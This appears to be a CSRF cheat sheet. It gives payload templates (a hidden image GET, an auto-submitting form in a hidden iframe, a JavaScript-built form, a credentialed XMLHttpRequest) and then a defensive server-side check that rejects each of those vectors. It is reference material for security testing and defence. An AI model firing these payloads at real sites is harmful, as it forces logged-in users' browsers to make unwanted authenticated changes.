CSRF

Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated.

GET

image
<img src="https://target.site/path?query" />

POST: application/x-www-form-urlencoded

iframe
<iframe style="display:none" name="csrf-frame"></iframe>
<form method='POST' action='http://vulnerablesite.com/form.php' target="csrf-frame" id="csrf-form">
  <input type='hidden' name='criticaltoggle' value='true'>
  <input type='submit' value='submit'>
</form>
<script>document.getElementById("csrf-form").submit()</script>

JavaScript Form
<script>
// Method and path of the state-changing request the target accepts.
var method = "post"; // or "get"
var path = "http://target.site/path?query";

// Body parameters, rendered as hidden inputs.
var params = {criticaltoggle: "true", randomparam: "randomvalue"};

var form = document.createElement("form");
form.setAttribute("method", method);
form.setAttribute("action", path);

for (var key in params) {
    if (params.hasOwnProperty(key)) {
        var hiddenField = document.createElement("input");
        hiddenField.setAttribute("type", "hidden");
        hiddenField.setAttribute("name", key);
        hiddenField.setAttribute("value", params[key]);

        form.appendChild(hiddenField);
    }
}

// Attach the form to the page and submit it without user interaction.
document.body.appendChild(form);
form.submit();
</script>

JavaScript AJAX

Depending on the Cross-Origin Resource Sharing (CORS) configuration, you may be able to trigger a CSRF-vulnerable function from JavaScript using AJAX (XMLHttpRequest); setting withCredentials makes the browser attach the user's cookies to the cross-origin request.

<script>
var xh = new XMLHttpRequest();

// Use the HTTP method the vulnerable endpoint expects ("POST" or "GET").
xh.open("POST", "https://target.site/path?query", true);
// Send the user's cookies along with the cross-origin request.
xh.withCredentials = true;

// Log progress of the request; readyState constants are exposed on the instance.
xh.onreadystatechange = function() {
    switch (this.readyState) {
        case this.OPENED:
            console.log("[*] CSRF request sent");
            break;

        case this.HEADERS_RECEIVED:
            console.log("[*] CSRF response status: " + this.status);
            break;

        case this.DONE:
            console.log("[*] CSRF response received");
            break;
    }
};

xh.send();
</script>

Tip

If you need to perform multiple requests in a loop, put all of the lines above (including the creation of the XMLHttpRequest object) inside the loop body, so that each iteration uses its own request object and the asynchronous callbacks do not interfere with one another.
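Added example (not from this cheat sheet): a server-side check that rejects each of the three vectors above, the GET image, the auto-submitted form and the credentialed XHR. It assumes a per-session synchronizer token stored server-side (`sessionCsrfToken`, a hypothetical field name) and an allowlist of origins; the sample requests are constructed to mirror the payloads on this page.

```javascript
// Server-side gate for state-changing requests (added example, not part of the
// cheat sheet). A request is a plain object {method, headers, body, sessionCsrfToken};
// sessionCsrfToken is the per-session token the server issued when it rendered the
// page (assumed name; it is distinct from the session id cookie).
var ALLOWED_ORIGINS = new Set(["https://target.site"]);

// Constant-time string comparison so a token check cannot be probed via timing.
// In production use crypto.timingSafeEqual; this version avoids a dependency.
function tokensMatch(a, b) {
  if (typeof a !== "string" || typeof b !== "string" || a.length !== b.length) return false;
  var diff = 0;
  for (var i = 0; i < a.length; i++) diff |= a.charCodeAt(i) ^ b.charCodeAt(i);
  return diff === 0;
}

// Returns a rejection reason, or null when the request may change state.
function csrfRejectReason(req) {
  var method = String(req.method).toUpperCase();
  // 1. Never change state on safe methods: this alone defeats the <img src=...> vector.
  if (method === "GET" || method === "HEAD") return "state change on safe method";
  // 2. Browsers add an Origin header to cross-site POSTs (form, iframe, XHR with
  //    credentials) that the attacking page cannot forge; require an allowlisted one.
  var origin = req.headers["origin"];
  if (!origin || !ALLOWED_ORIGINS.has(origin)) return "origin not allowed";
  // 3. Synchronizer token: a cross-site page cannot read the user's token, so a
  //    forged form or XHR body carries no valid one.
  if (!tokensMatch(req.body && req.body.csrf_token, req.sessionCsrfToken)) return "bad csrf token";
  return null;
}

// Constructed sample requests modelled on the payloads in this cheat sheet.
var SESSION_CSRF_TOKEN = "constructed-token-5f2a9c";
var SAMPLES = {
  imgGet:   { method: "GET",  headers: {}, body: {}, sessionCsrfToken: SESSION_CSRF_TOKEN },
  formPost: { method: "POST", headers: { origin: "https://attacker.example" },
              body: { criticaltoggle: "true" }, sessionCsrfToken: SESSION_CSRF_TOKEN },
  xhrPost:  { method: "POST", headers: { origin: "https://attacker.example" },
              body: { criticaltoggle: "true", csrf_token: "guessed" }, sessionCsrfToken: SESSION_CSRF_TOKEN },
  legit:    { method: "POST", headers: { origin: "https://target.site" },
              body: { criticaltoggle: "true", csrf_token: SESSION_CSRF_TOKEN }, sessionCsrfToken: SESSION_CSRF_TOKEN }
};

// Runs every sample through the gate and returns {name: reason-or-null}.
function evaluateSamples() {
  var out = {};
  for (var name in SAMPLES) out[name] = csrfRejectReason(SAMPLES[name]);
  return out;
}
```

Only the `legit` sample passes; the three forged ones are stopped at the earliest applicable check, which is why the method and Origin checks should run before the token comparison.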

References: